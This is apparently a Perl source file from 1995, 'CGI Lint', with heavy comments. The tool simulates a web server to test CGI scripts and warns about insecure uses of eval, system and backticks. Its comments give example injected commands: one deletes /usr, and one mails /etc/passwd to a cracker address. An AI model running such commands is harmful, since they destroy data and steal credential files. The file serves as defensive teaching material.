
#!/usr/local/bin/perl

##++
##    CGI Lint v1.0
##    Last modified: November 25, 1995
##
##    Copyright (c) 1995, 1996
##    Shishir Gundavaram and O'Reilly & Associates
##    All Rights Reserved
##
##    E-Mail: shishir@ora.com
##
##    Permission to use, copy, modify and distribute is hereby granted,
##    providing  that  no charges are involved and the above  copyright
##    notice and this permission appear in all copies and in supporting
##    documentation. Requests for other distribution  rights, including
##    incorporation in commercial  products,  such as  books,  magazine
##    articles, or CD-ROMS should be made to the authors.
##
##    This  program  is distributed in the hope that it will be useful,
##    but WITHOUT ANY WARRANTY;  without  even  the implied warranty of
##    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
##--

############################################################################

#++
# Here is how you should run this script:
#
# usage: CGI_Lint configuration_file [data_file]
#
# - The configuration file should contain a list of environment variables
#   and their values, such as:
#
#       REQUEST_METHOD     =   GET
#       QUERY_STRING       =   name=John Surge&company=ABC Corporation!
#       HTTP_ACCEPT        =   image/gif, image/x-xbitmap, image/jpeg, */*
#       SERVER_PROTOCOL    =   HTTP/1.0
#       REMOTE_ADDR        =   198.198.198.198
#       DOCUMENT_ROOT      =   /usr/local/bin/httpd_1.4.2/public
#       GATEWAY_INTERFACE  =   CGI/1.1
#       REQUEST_METHOD     =   GET
#       SCRIPT_NAME        =   /cgi-bin/abc.pl
#       SERVER_SOFTWARE    =   NCSA/1.4.2
#       REMOTE_HOST        =   gateway.cgi.com
#
#       * The most important field here is SCRIPT_NAME, which should point to
#         to the script you want to test.
#
#       * You do not have to encode the information in QUERY_STRING. But, you
#         you do have to *escape* the "%", "&", or the "=" characters.
#
# - The data file (optional) should contain a list of the fields (and
#   values) of your form. Here is an example of a data file for multipart
#   message (you need to set CONTENT_TYPE = multipart/form-data).
#
#       name = Joe = Joseph
#       company = JP & Play
#       percentage = 50%
#       review = */usr/shishir/rev.dat
#
#       * Any time you have a file field, you need to specify a valid
#         filename (with an asterisk before it).
#
#   For non multipart data (i.e application/x-www-form-urlencoded), you
#   can specify the data in the same format as above (except for the fact that
#   you need to escape certain characters).
#--

$| = 1;
$cat = "/usr/bin/cat -u";

#++
# Buffering is turned off, so that messages and data are displayed in the
# correct order in which they were written. The cat UNIX utility is used by
# CGI Lint to send a data file to the CGI scripts. The -u switch forces cat
# to display the file in unbuffered mode. In other words, each line is output
# as soon as it is read.
#--

($config_file, $data_file) = @ARGV;

#++
# The two command line parameters are read from the ARGV array, and are
# stored in config_file and data_file variables.
#--

&load_errors ();

#++
# The laod_errors subroutine sets the ERRORS associative array with all of
# error messages used by this application.
#--

if ($config_file) {
    &parse_config_file ($config_file);

    #++
    # If the user passed a configuration file (containing a list of the
    # environment variables) to this tool, the following block of code is
    # executed. First, the parse_config_file subroutine goes through the
    # configuration file and sets up the environment variables in the ENV
    # associative array. Remember, these new environment variables are
    # available for all processes that this script creates (or executes), but
    # disappear when this process, itself, terminates.
    #--

    &parse_NCSA_srm_file ();

    #++
    # The parse_NCSA_srm file reads through the NCSA server resource map
    # configuration file looking for any of the following lines:
    #
    # ScriptAlias  /my-cgi-apps/            /usr/local/bin/httpd_1.4.2/cgi-bin/
    # AddType      application/x-httpd-cgi  .cgi .pl
    #
    # The main reason for doing this is to make sure that the script referred
    # to in the environment variable SCRIPT_NAME is a recognizable (or valid)
    # CGI script, as far as the server is concerned. Or else, an error message
    # is displayed.
    #--

    &check_script_path ();

    #++
    # The full path to the script is determined by looking at the value stored
    # in the environment variable DOCUMENT_ROOT (or SERVER_ROOT is the server
    # is not installed normally). We will look at this in more detail when
    #  we analyze the subroutine.
    #--

    &check_script_permissions ();

    #++
    # CGI Lint makes sure that the specified script is executable. In order to
    # truly simulate a server, this tool has to be installed as a setuid
    # script. In other words, this tool has to run with the same user
    # identification as that of the server. See the book for a "wrapper"
    # program.
    #--

    &check_script_header ();

    #++
    # The CGI script is checked for the #! header line at the top of the
    # script. This subroutine also ensures that the specified interpreter
    # exists, and is executable.
    #--

    if ($ENV{'INTERPRETER'} =~ /perl/i) {
        &check_perl_syntax ();
        &check_perl_code ();
    }

    #++
    # The environment variable INTERPRETER is set to the name and path of the
    # interpreter (by the check_script_header subroutine) that will execute the
    # CGI script. If it is as a Perl script, two subroutines are called. First,
    # the check_perl_syntax looks for syntax errors in the script, and second,
    # check_perl_code searches the script for potential performance and
    # security problems dealing with the eval, open, and system commands.
    #--

    &run_script ($data_file);

    #++
    # Finally, the run_script subroutine is called to execute the script. There
    # is a lot of data processing that goes on before the CGI script is
    # actually executed.
    #--

} else {
    &terminate ("Usage");
}

exit (0);

#++
# If the configuration file is not passed to this tool, the terminate
# subroutine is called with an argument of "Usage", which displays the error
# message of the same name, as stored in the ERRORS associative array, and
# exits. Now, let us look at the various subroutines that provide the core of
# functionality.
#--

#++
# S U B R O U T I N E S
#--

sub parse_config_file
{
    local ($file) = @_;

    open (CONFIG, "<" . $file) || &terminate ("Config_File");
    while (<CONFIG>) {
        if (/^\s*(\w+)\s*=\s*(.*)\s*$/) {
            $ENV{$1} = join ("", "__", $2);
        }
    }
    close (CONFIG);

    #++
    # The configuration file is opened in read mode. If it cannot be opened,
    # the "Config_Error" message is displayed. The while loop iterates
    # through the file, looking for lines that start with the following format:
    #
    # key1 = value1
    # key2 = value2
    # key3 = value3
    #
    # The regular expression ignores leading and trailing whitespace, so you
    # can align all of the key/value pairs (environment variables) for better
    # readibility. The data is stored in the environment variable array ENV.
    # Notice how each value is preceded with the "__" characters. Later on in
    # this script, this is used to remove all of the other UNIX environment
    # variables to provide a realistic simulation of the server.
    #--

    unless ($ENV{'SERVER_ROOT'}) {
        ($ENV{'SERVER_ROOT'}) = $ENV{'DOCUMENT_ROOT'} =~ m|^(.*)/|;
    }

    #++
    # The subroutine checks for the SERVER_ROOT variable in the configuration
    # file, which should point to the server root directory, in case your
    # server setup is somehow different from the regular (and usual)
    # configuration. However, if your server setup matches the one defined by
    # NCSA, you only need to define the DOCUMENT_ROOT variable.
    #--

    $ENV{'SERVER_ROOT'} =~ s/^__//;
}

#++
# The SERVER_ROOT variable is not defined by any of the servers today, but is
# used by this script exclusively for the purpose of determining the server
# root directory. It is not available to the CGI script (the leading "__" is
# removed from the variable.
#--

sub parse_NCSA_srm_file
{
    local ($srm_file, $alias, $real);

    $srm_file = join ("/", $ENV{'SERVER_ROOT'}, "conf", "srm.conf");

    open (SRM, "<" . $srm_file) || &terminate ("Srm_File");

    while (<SRM>) {
        if ( ($alias, $real) = /^\s*ScriptAlias\s*(\S+)\s*(\S+)\s*$/) {
            $ENV{$alias} = $real;

    #++
    # This subroutine iterates through the server resource map configuration
    # file, searching for lines that begin with either ScriptAlias or AddType.
    # If the line contains the ScriptAlias directive, the associative array
    # element is created, with the key being the alias (i.e "/cgi-bin") and the
    # value being the true directory (i.e "/usr/local/httpd_1.4.2/cgi-bin").
    # This makes it very easy to check to see if a script resides in this
    # directory.
    #--
        } elsif (/^s*AddType\s*application\/x-httpd-cgi\s*(.*)\s*$/) {
            ($ENV{'CGI_TYPES'} = $1) =~ s/\s+/\|/g;
        }
    }

    close (SRM);
}

#++
# All of the file extensions listed on the AddType directive are converted
# into a regular expression (by removing the spaces, and adding the
# alternation character, "|") and are stored in the the CGI_TYPES environment
# variable. Notice how the values of both of these variables do not contain
# "__" which indicates that they will not be available for the CGI script.
#--

sub check_script_path
{
    local ($script_name, $cgi_path, $cgi_script, $file_type);

    ($script_name = $ENV{'SCRIPT_NAME'}) =~ s/^__//;
    ($cgi_path, $cgi_script) = $script_name =~ m|^(.*/)(.*)$|;

    $ENV{'NPH_SCRIPT'} = ($cgi_script =~ /^nph-/) ? 1 : 0;

    #++
    # This subroutine performs a couple of functions. First, it determines
    # whether the CGI script is a Non Parse Header script, by searching to see
    # if the script starts with the string "nph-".
    #--

    if (defined ($ENV{$cgi_path})) {
        $ENV{'SCRIPT_PATH'} = join ("", $ENV{$cgi_path}, $cgi_script);
        &terminate ("Bad_Script") unless (-e $ENV{'SCRIPT_PATH'});

    #++
    # The previous subroutine created elements (or variables) in the ENV
    # associative array for each ScriptAlias directory, like this:
    #
    # $ENV{'/cgi-bin/'} = "/usr/local/httpd_1.4.2/cgi-bin"
    #
    # This conditional determines the path for the cgi script, and checks to
    # see if there is a key by the same name. If it is successful, it
    # indicates that the script is located in a valid directory. The
    # environment variable SCRIPT_PATH refers to the full path (not relative)
    # to the script Then, the subroutine makes sure the file exists, or an
    # error message is output.
    #--

    } elsif ( ($file_type) = $cgi_script =~ /(\.\w+)$/ ) {
        if ($file_type =~ /$ENV{'CGI_TYPES'}\b/) {
            $cgi_path = "/"     unless ($cgi_path);

            $ENV{'SCRIPT_PATH'} = join ("", $ENV{'SERVER_ROOT'},
                                            $cgi_path,
                                            $cgi_script);

            &terminate ("Bad_Script") unless (-e $ENV{'SCRIPT_PATH'});

    #++
    # If the CGI script is not located in a valid directory, this branch of
    # code is executed, which determines if the script has a valid file
    # extension.
    #--

        } else {
            &terminate ("Invalid_CGI");
        }
    } else {
        &terminate ("Invalid_CGI");
    }
}

#++
# Finally, if the script is not located in a valid directory, nor has a
# correct extension, an error message is output.
#--

sub check_script_permissions
{
    unless (-x $ENV{'SCRIPT_PATH'}) {
        &terminate ("Script_Permissions");
    }
}

#++
# This is a simple subroutine that determines whether the script can be
# executed by the effective user identication (uid). UNIX had two ways of
# determining permissions and priviliges: the effective uid, and the real
# uid. If this tool is being run as a setuid script (with a uid of "nobody"),
# the effective uid reflects this, while the real uid refers to your real
# identication.
#--

sub check_script_header
{
    local ($header_line, $program_name);

    open (SCRIPT, "<" . $ENV{'SCRIPT_PATH'}) || &terminate ("Script_Open");
    $header_line = <SCRIPT>;
    close (SCRIPT);

    if ( ($program_name) = $header_line =~ /^#!(\S+)$/) {
        stat ($program_name);

        if ( (-e _) && (-B _) && (-x _) ) {
            $ENV{'INTERPRETER'} = $program_name;
        } else {
            &terminate ("Bad_Program");
        }
    } else {
        &terminate ("No_Header");
    }
}

#++
# This subroutine checks to see if the first line of the script starts with
# the #! string. If it does, CGI Line makes sure that the interpreter exists,
# is a binary file, and can be executed by this process. The path to the
# interpreter is stored in the environment variable INTERPRETER.
#--

sub check_perl_syntax
{
    local ($command, $status, @errors);

    $status = 1;
    @errors = ();

    $command = join (" ", $ENV{'INTERPRETER'}, "-c", $ENV{'SCRIPT_PATH'});

    open (SCRIPT, "$command 2>&1 |");

    while (<SCRIPT>) {
        if (/syntax OK/) {
            $status = 0;
        } else {
            push (@errors, $_);
        }
    }

    close (SCRIPT);

    &print_message_box ("Bad_Syntax", *errors, 1)   if ($status);
}

#++
# This subroutine checks the syntax of a Perl script. It opens a pipe to the
# script, "dupes" the standard error to standard output (so that errors are
# visible through the pipe), and iterates through the data. Any errors are
# stored in the errors array. Finally, all the errors are displayed by
# calling the print_message_box subroutine. The first argument refers to the
# error message to display, the second is a reference to the array that
# contains the errors, and the last argument instructs the subroutine to exit
# (as the errors are considered serious).
#--

sub print_message_box
{
    local ($message, *information, $exit_status) = @_;
    local ($solid_line);

    $solid_line = join ("", "=" x 80, "\n");

    print $ERRORS{$message};
    print $solid_line, @information, $solid_line, "\n";

    exit (1)  if ($exit_status);
}

#++
# This subroutine simply displays the specified error message, along with the
# array containing the errors. Finally, the script exists if a status of 1 is
# passed to it.
#--

sub check_perl_code
{
    local ($open, $file, @errors, @check, $variable, $status,
           $error_status, $construct, $system);

    $system = 0;
    @errors = ();
    @check = ();

    open (SCRIPT, "<" . $ENV{'SCRIPT_PATH'}) || &terminate ("Script_Open");

    #++
    # This is a very important subroutine. It parses the script, and looks for
    # errors in the eval statement, open command, the system command, and a
    # statement with backtics. It will notify you of any file problems, as well
    # as alert you of possible security holes.
    #--

    while (<SCRIPT>) {
        s/^\s*(.*)\s*$/$1/;
        next if (/^#/);

    #++
    # The while loop iterates through the file. All leading and trailing spaces
    # are removed, and lines that start with a comment delimiter ("#") are
    # ignored.
    #--

        if (($open, $file) =
             /(open\s*\(\s*\w+\s*,\s*['"]?([^'"]+)['"]?\s*\))/) {

    #++
    # If a line starts with a open command, this block of code is executed. The
    # parser is not very robust, and so does not recognize statements that span
    # multiple lines. The file (or pipe) that is being opened is stored in the
    # variable file.
    #--

            if ($file !~ /\$/) {

    #++
    # If the file being opened does not contain any variables (i.e no dollar
    # signs), this block tries to open the specified file by evaluating the
    # expression at runtime. The end result of this is a success or a failure,
    # in which you are notified.
    #--

                open (STDERR_COPY, ">&" . STDERR);
                open (STDERR, ">" . "/dev/null");

    #++
    # A copy of standard error is made, while the original STDERR is redirected
    # to /dev/null (error messages are thrown away, so the statements below can
    # handle the errors). This process ensures that STDERR can be restored
    # later.
    #--

                $status = eval (qq/open (DEBUG, "$file");/);
                eval (qq/close DEBUG/);

                $error_status = ($? >> 8);

                if ( ($error_status) || ($status == 0) ) {
                    push (@errors,
                         "Error opening: $file\n", "$!\n");
                }

    #++
    # The specified file is opened with a temporary filehandle. If the file
    # does not contain a pipe, and does not exist, the variable status will
    # contain the value of 0. On the other hand, if the file contains a pipe
    # which fails, the error status is not available until the filehandle is
    # closed.
    #--

                close (STDERR);
                open  (STDERR, ">&" . STDERR_COPY);
                close (STDERR_COPY);

    #++
    # Finally, STDERR is restored, and the temporary standard error filehandle
    # is closed.
    #--

            } else {
                ($variable) = $file =~ /(\$\w+)/;
                push (@check, "Check the variable $variable\n",
                          "In the open command: $open\n");
            }

    #++
    # If the file specified in the open command contains a dollar sign, CGI
    # Lint simply displays a warning instructing you to check the value of the
    # variable.
    #
    # NOTE: All of the code below can be improved greatly by using taint
    #       checking in Perl 5.
    #--

        } elsif ( ($construct) =
              /eval\s*\(?\s*['"]?\s*(.*)\s*['"]?\s*\)?\s*;/ ) {

            if ($construct =~ /\$/) {
                push (@check,
                "Check the *eval* on line: $_\n",
                "Variable(s) *may* not be secure!\n");
            }

    #++
    # If a line contains an eval command with its expression containing a
    # dollar sign, a warning is displayed. It can be dangerous to evaluate an
    # expression without checking it, as it can have dangerous command embedded
    # within it. For example, a cracker inputs the following data into a name
    # field:
    #
    # system ('/usr/bin/rm -fr /usr');
    #
    # You decode the data, store this information in $DATA{'name'}, and decide
    # to evaluate it by doing something like this:
    #
    # eval ($DB{'name'});
    #
    # Guess what? You are in serious trouble, as the /usr directory will be
    # removed. Perl has a lot of powerful features, and if you are not careful,
    # a cracker can do serious damge to your system like:
    #
    # * hijacking the /etc/password file
    # * removing (or unlinking) directories
    # * and even rebooting the system
    #
    # The moral is: never trust any information coming from the Web! Always
    # assume there are hackers trying to break into your system.
    #--

        } elsif ( ($construct) =
              /system\s*\(?\s*['"]?\s*(.*)\s*['"]?\s*\)?\s*;/) {

            if ($construct =~ /\$/) {
                push (@check,
                "Check the *system* on line: $_\n",
                "Variable(s) *may* not be secure!\n");
            }

            $system = 1;

    #++
    # The system command is checked in the same way as the eval command. The
    # system variable is set to 1 to indicate that a system command was found.
    # This variable is used to output a "Turn buffering off" message (as you
    # will soon see).
    #--

        } elsif ( ($construct) = /`\s*(.*)\s*`;/) {

            if ($construct =~ /\$/) {
                push (@check,
                "Check the *backtics* on line: $_\n",
                "Variable(s) *may* not be secure!\n");
            }
        }
    }

    close (SCRIPT);

    #++
    # Again, backtics are just as dangerous (and powerful) as the system
    # command. Someone can enter a command like this into a form:
    #
    # mail -s "Ha! Got your password file!!" cracker@crime.net < /etc/passwd
    #
    # If you do something like this:
    #
    # system ($DATA{'name'});
    #
    # or
    #
    # `$DATA{'name'}`;
    #
    # your system can be broken into. All the cracker would then have to do is
    # run the crack program (to figure out obvious passwords) on the password
    # file on his own system. From there, he can get into your system!
    #--

    print $ERRORS{'System_Command'} if ($system);

    #++
    # If the system variable has a value of 1, the "System_Command" message is
    # output. It merely instructs you to turn buffering off, or the output of
    # your script may not be in the order you would like.
    #--

    &print_message_box ("Perl_Check", *check, undef) if (scalar (@check));
    &print_message_box ("Perl_Errors", *errors, 1)   if (scalar (@errors));
}

#++
# Finally, the print_message_box is called to output the warnings and errors.
# In the case of errors, a value of 1 is passed as the last argument, in
# which case, this script terminates.
#--

sub setup_true_environment
{
    local ($key, $value);

    foreach $key (keys %ENV) {

        if ( ($value) = $ENV{$key} =~ /^__(.*)$/) {
            $ENV{$key} = $value;
        } else {
            delete $ENV{$key};
        }
    }

    if ($ENV{'REQUEST_METHOD'} eq /^get$/i) {
        delete $ENV{'CONTENT_TYPE'};
        delete $ENV{'CONTENT_LENGTH'};
    }
}

#++
# This is a very simple subroutine that creates a very realistic environment
# by removing any environment variables whose values do contain a "__" at the
# beginning of the string. Also, if the request method is "GET", the
# CONTENT_TYPE and CONTENT_LENGTH variables are deleted (if they exist). It
# is not necessary to do this, but is done for the sake of emulating the
# server exactly.
#--

sub encode_URL
{
    local ($string) = @_;

    $string =~ s/\\%/%25/g;
    $string =~ s/\\&/%26/g;
    $string =~ s/\\=/%3d/g;

    $string =~ s/([^A-Za-z0-9_=&%])/sprintf("%%%x", ord($1))/eg;

    return ($string);
}

#++
# This subroutine encodes the string that is passed to it. First, all of the
# characters that are escaped are converted to their hexadecimal equivalents.
# Then,  the rest of the string is encoded, making sure that already encoded
# information is not further encoded. As a result, you can encode some
# characters yourself in the query string, and leave others for CGI Lint.
# Finally, the fully encoded string is returned.
#--

sub open_pipe
{
    local ($pipe_command, $nph_status) = @_;
    local (@http_headers, $all_headers, $first_line, @output_data,
           $status, $error_status);

    $status = 0;
    @http_headers = ();
    @output_data = ();

    #++
    # This is also a very crucial part of CGI Lint. It is called by the
    # run_script subroutine to execute the CGI program, and check its output.
    #--

    push (@http_headers, 'Allowed:',
                         'Content-[Ee]ncoding:',
                         'Content-[Ll]anguage:',
                         'Content-[Ll]ength:',
                         'Content-[Tt]ransfer-[Ee]ncoding:',
                         'Content-[Tt]ype:\s*\w+\/\w+',
                         'Cost:',
                         'Date:',
                         'Derived-[Ff]rom:',
                         'Expires:',
                         'Last-[Mm]odified:',
                         'Link:',
                         'Location:',
                         'Message-[Ii]d:',
                         'Pragma:',
                         'Public:',
                         'Refresh:',
                         'Status:',
                         'Title:',
                         'URI:',
                         'Version:');

    push (@http_headers, 'Content-[Tt]ype:\s*\w+\/([\w\-]);boundary=\S+',
                         'Set-[Cc]ookie:',
                         'Refresh:');

    #++
    # All of the valid HTTP headers are stored in the http_headers array, so
    # the output headers from the CGI script can be checked for validity. The
    # last few are Netscape Navigator specific.
    #--

    $all_headers = join ("|", @http_headers);

    #++
    # All of the headers are concatenated by the "|" character. Basically, a
    # big regular expression is being created.
    #--

    open (OUTPUT, "$pipe_command 2>&1 |");
    $first_line = <OUTPUT>;

    #++
    # The CGI script is executed, and the output is piped into the OUTPUT
    # filehandle. Standard error is "duped" to standard output, so any or all
    # errors are visible.
    #--

    if ($nph_status) {
        unless ($first_line =~ m|^HTTP/\d+\.\d+\s*\d+\s*(.*)\s*$|) {
            &terminate ("NPH_Script");
        }
    } else {
        unless ($first_line =~ /$all_headers/) {
            &terminate ("HTTP_Headers");
        }
    }

    #++
    # If the nph_status variable is defined (actually passed by the run_script
    # subroutine), the first output line is checked to see that it is in the
    # form of:
    #
    # HTTP/n.n nnn xxxxxxx
    #
    # If the CGI script is not a NPH script, the line is checked to make sure
    # it contains a valid HTTP header.
    #--

    while (<OUTPUT>) {
        if (/^\s*$/) {
            while (<OUTPUT>) {
                push (@output, $_);
            }

            $status = 1;
        } elsif (!/^$all_headers\b/o) {
            &terminate ("HTTP_Headers");
        }
    }

    close (OUTPUT);

    #++
    # This loop simply iterates through the file. Every time through the loop,
    # it checks for a blank line (signaling the end of the HTTP header data).
    # Once it is found, the rest of the output stream is read and stored in the
    # output array. On the other hand, if neither a valid HTTP header nor a
    # blank line is found, an error message is displayed.
    #--

    if ($status) {
        $error_status = ($? >> 8);

        if ($error_status) {
            &print_message_box ("Bad_Syntax", *output, 1);
        } else {
            &print_message_box ("Output", *output, undef);
        }
    }
}

#++
# Once the filehandle is closed, the error status is checked. If a error
# occurred during execution, an error message is output. Otherwise, the
# output from the CGI script is displayed.
#--

sub parse_URL_data_file
{
    local ($type, $data_file, $post_file) = @_;
    local ($key, $value, $key_value, @data, $existing_data_length,
           $query_string, $count, $no_fields, $post_data);

    #++
    # This subroutine is responsible for parsing the appropriate data file,
    # calling encode_URL to encode the data, and in the case of a "POST"
    # request, creating the temporary output file that simulates a server's
    # output stream.
    #--

    open (DATA, "<" . $data_file) || &terminate ("Data_File");

    while (<DATA>) {
        if ( ($key, $value) = /^\s*([^=\s]+)\s*=\s*(.*)\s*$/ ) {
            $key_value = join ("=", $key, $value);
            push (@data, $key_value);
        }
    }
    close (DATA);

    #++
    # The while loop iterates through the data file, and searches for (key =
    # value) type of expressions. The regular expression ensures that multiple
    # equal signs on a single line do not wreak havoc with the data. All the
    # key/value pairs are stored in the data array.
    #--

    if ($type eq "GET") {
        $query_string = $ENV{'QUERY_STRING'};
        $existing_data_length = length ($query_string);

        if (scalar (@data)) {
            $query_string = join ("&", $query_string, @data);

            if ($existing_data_length > 0) {
                $query_string=~ s/^&//;
            }

            $ENV{'QUERY_STRING'} = &encode_URL ($query_string);
        }

    #++
    # If the configuration file specified a "GET" request, this branch of code
    # is executed. If the QUERY_STRING variable already contains data, the new
    # data from the file is simply appended to it, and the whole expression is
    # encoded at once.
    #--

    } elsif ($type eq "POST") {

        open (FILE, ">" . $post_file) || &terminate ("Post_File");

        $no_fields = $#data;

        for ($count=0; $count <= $no_fields; $count++) {
            $post_data = &encode_URL ($data[$count]);
            print FILE $post_data;
            print FILE "&" if ($count < $no_fields);
        }

        close (FILE);
    }
}

#++
# If the request calls for "POST", a temporary file (as specified by an
# argument from the run_script subroutine) is created to store the encoded
# data.
#--

sub parse_multipart_file
{
    local ($data_file, $write_file) = @_;
    local ($terminator, $boundary, $footer, $key, $value, $header);

    $terminator = "\r\n";
    $boundary = join ("", "-" x 29, time);
    $footer = "--";

    #++
    # This subroutine creates a multipart MIME message by reading the
    # information from the data file. The boundary is randomly generated, based
    # on the current time (in seconds since 1970).
    #
    # NOTE: The CGI Lite module (available at CPAN mirrors) can be used to
    #       decode multipart MIME messages. The current version of this module
    #       is v1.5 (as of November 25, 1995). I am currently working on some
    #       enhancements to the module.
    #--

    open (DATA,  "<" . $data_file)  || &terminate ("Data_File");
    open (WRITE, ">" . $write_file) || &terminate ("Post_File");

    print WRITE $boundary;

    #++
    # Both the data file, and the temporary file to hold the multipart message
    # are opened. And, the first boundary string is written to the output file.
    #--

    while (<DATA>) {
        if ( ($key, $value) = /^\s*([^\s]+)\s*=\s*(.*)\s*$/ ) {
            $header = qq/Content-disposition: form-data; name="$key"/;

    #++
    # The loop iterates through the file looking for the same old (key = value)
    # pairs. A "Content-disposition" header is generated and the name of the
    # field is set to the key value from the data file.
    #--

            if ($value =~ /^\*/) {
                $value =~ s///;
                $header = join ("", $header, ";", qq/ filename="$value"/);
            }

    #++
    # If the value starts with an asterisk ("*"), a filename part is added to
    # the previous header. You might be wondering what the following line
    # means:
    #
    # $value =~ s///;
    #
    # This tells Perl to use the last regular expression. In this case, the
    # asterisk is removed (or substituted with a undefined value).
    #--

            $header = join ("", $terminator, $header, $terminator x 2);
            print WRITE $header;

    #++
    # The complete header is written to the file. Remember, according to
    # Netscape 2.0b2, there is an extra carriage return/newline string after
    # the header.
    #--

            if ($header =~ /filename=/) {
                open (FILE, "<" . $value) || &terminate ("Multipart_File");

                while (<FILE>) {
                    print WRITE;
                }

                close (FILE);
            } else {
                print WRITE $value;
            }
            print WRITE $terminator, $boundary;
        }
    }

    #++
    # If the data file specified a filename for the current field, the entire
    # contents of the file are written to the temporary output file. If not,
    # the value of the field is output. Finally, the boundary is "closed".
    #--

    print WRITE $footer, $boundary;

    close (WRITE);
    close (DATA);

    return ($boundary);
}

#++
# Once the entire script is parsed, the ending boundary string is output to
# the temporary file, and both of the files are closed. Finally, the random
# boundary that was generated by this subroutine is returned to the calling
# subroutine (run_script), so that it can set the CONTENT_TYPE environment
# variable.
#--

sub run_script
{
    local ($cgi_input_file) = @_;
    local ($cgi_script, $nph_script, $content_type, $tmp_file,
           $boundary, $command);

    #++
    # This is the subroutine that calls all of the other subroutines to perform
    # such tasks as: encoding the data, creating necessary output files,
    # running the CGI program, and validating its output.
    #--

    $cgi_script  = $ENV{'SCRIPT_PATH'};
    $nph_script  = $ENV{'NPH_SCRIPT'};

    &setup_true_environment ();

    #++
    # Since the setup_true_environment removes all but the environment
    # variables defined in the configuration file, the SCRIPT_PATH and
    # NPH_SCRIPT variables are stored for later use.
    #--

    $ENV{'QUERY_STRING'} = &encode_URL ($ENV{'QUERY_STRING'});
    $request_method = $ENV{'REQUEST_METHOD'};

    #++
    # The information stored in the QUERY_STRING variable is encoded by calling
    # the encode_URL subroutine.
    #--

    if ($request_method =~ /^get$/i) {
        if (defined ($cgi_input_file)) {
            &parse_URL_data_file ("GET", $cgi_input_file, undef);
        }

        &open_pipe ($cgi_script, $nph_script);

    #++
    # The parse_URL_data_file subroutine is called if you specify a data file.
    # If not, open_pipe is called to execute the script. The two arguments
    # passed to this subroutine are the CGI script name, and the status
    # indicating whether it is a NPH script.
    #--

    } elsif ($request_method =~ /^post$/i) {
        $content_type = $ENV{'CONTENT_TYPE'};

        if (defined ($cgi_input_file)) {
            $tmp_file = join ("", "/tmp/", "post_data_", $$);

    #++
    # If the "POST" request method is specified, it checks to see if you passed
    # in a data file. A temporary file is also created to hold the encoded
    # information.
    #--

            if ($content_type =~ /^multipart\/form-data/) {

                $boundary = &parse_multipart_file ($cgi_input_file, $tmp_file);

                $ENV{'CONTENT_TYPE'} =
                        "multipart/form-data; boundary=$boundary";

    #++
    # If the CONTENT_TYPE is set to "multipart/form-data" in the configuration
    # file, the parse_multipart_data subroutine is called to load the
    # information into the temporary file. The subroutine also returns the
    # random boundary that was chosen. This boundary information is used to set
    # the exact CONTENT_TYPE.
    #--

            } elsif ( ($content_type eq "") || ($content_type eq
                "application/x-www-form-urlencoded") ) {

                $ENV{'CONTENT_TYPE'} = "application/x-www-form-urlencoded";

                &parse_URL_data_file ("POST", $cgi_input_file, $tmp_file);

    #++
    # If no CONTENT_TYPE was specified, or was set to
    # "application/x-www-form-urlencoded", the parse_URL_data_file subroutine
    # is called to output the POST data to the temporary file.
    #--

            } else {
                &terminate ("Content_Type");
            }

            $ENV{'CONTENT_LENGTH'} = (stat ($tmp_file))[7];

            $command = join(" ", $cat, $tmp_file, "|", $cgi_script);
            &open_pipe ($command, $nph_script);

    #++
    # If a valid content type was specified, the CONTENT_LENGTH variable is set
    # to the number of bytes in the temporary file by using the stat command.
    # Finally, the open_pipe subroutine is called to execute the script.
    #--

        } else {
            &terminate ("Data_File");
        }
    } else {
        &terminate ("Request_Method");
    }
}

#++
# If a request method, other than "GET" or "POST", is specified, an error
# message is output. An error is also returned if a data file was not
# specified for the "POST" request method.
#--

sub terminate
{
    local ($error_message) = @_;

    print $ERRORS{$error_message};

    close ();
    exit (1);
}

#++
# The terminate subroutine displays the specified error, closes all files,
# and exits with an error status.
#--

#++
# The following subroutine simply loads errors into a associative array.
#--

sub load_errors
{
    $ERRORS{'Config_File'} = <<Config_File;

The configuration file (that holds the environment variable data) could
not be found. This file is needed to run this program. Please check
and try again.

Config_File

    $ERRORS{'Srm_File'} = <<Srm_File;

The NCSA server resource map configuration file (srm.conf) could not
be found. This might be due to the way your server is setup. In order to
rectify the situation, define a variable called SERVER_ROOT (with the
correct server root directory) in the configuration file, and try again.

Srm_File

    $ERRORS{'Invalid_CGI'} = <<Invalid_CGI;

Sorry, either the file extension or the path to your CGI script is not
valid. Check both of these to make sure they are configured in the NCSA
server resource map configuration (srm.conf) file.

Invalid_CGI

    $ERRORS{'Usage'} = <<Usage;

Here is how you should run this script:

usage: $0 configuration_file [data_file]

- The configuration file should contain a list of environment variables
  and their values.
- The data file (optional) should contain a list of the fields (and
  values) of your form.

Usage

    $ERRORS{'Script_Permissions'} = <<Script_Permissions;

You do not have the necessary privileges to run the specified script.
Use the chmod command to change the permissions, and try again.

Script_Permissions

    $ERRORS{'Bad_Script'} = <<Bad_Script;

The CGI program that is specified in the configuration file does
not exist. Please check the path, and try again.

Bad_Script

    $ERRORS{'Script_Open'} = <<Script_Open;

The CGI program that is specified could not be opened. Please check the
permissions and try again.

Script_Open

    $ERRORS{'Bad_Program'} = <<Bad_Program;

The interpreter you specified either does not exist, is not readable,
or is not a binary file. Please check the path, and try again.

Bad_Program

    $ERRORS{'No_Header'} = <<No_Header;

The script you specified does not have a header line that points to a
interpreter that will execute the script. The header line should be
something like this:

    #!/usr/local/bin/perl

No_Header

    $ERRORS{'Bad_Syntax'} = <<Bad_Syntax;

Oops! The script you wrote had errors. I will list all the bugs
here. Please fix them and try again. Here they are:

Bad_Syntax

    $ERRORS{'Perl_Errors'} = <<Perl_Errors;

While looking at your Perl script for possible security holes and
"open" commands, I came across the following *errors*:

Perl_Errors

    $ERRORS{'Perl_Check'} = <<Perl_Check;

While looking at your Perl script for possible security holes and
"open" commands, I came across the following statements that *might*
constitute a security breach:

Perl_Check

    $ERRORS{'Data_File'} = <<Data_File;

The data file (that holds the potential form data) could not be found.
Please check the file specification and try again.

Data_File

    $ERRORS{'Post_File'} = <<Post_File;

A data file to store the simulated POST data cannot be created. Please
check to see if you have privileges to write to the /tmp directory.

Post_File

    $ERRORS{'Multipart_File'} = <<Multipart_File;

One of the filename that you listed in the simulated multipart data file
does not exist. Make sure to check all possible fields, and try again.

Multipart_File

    $ERRORS{'Content_Type'} = <<Content_Type;

The CONTENT_TYPE variable in your data file is not set correctly. You do
not
have to set a value for this, as I will default it to:

    application/x-www-form-urlencoded

But, if you do set a value for this variable, it has to be either the one
mentioned above, or:

    multipart/form-data

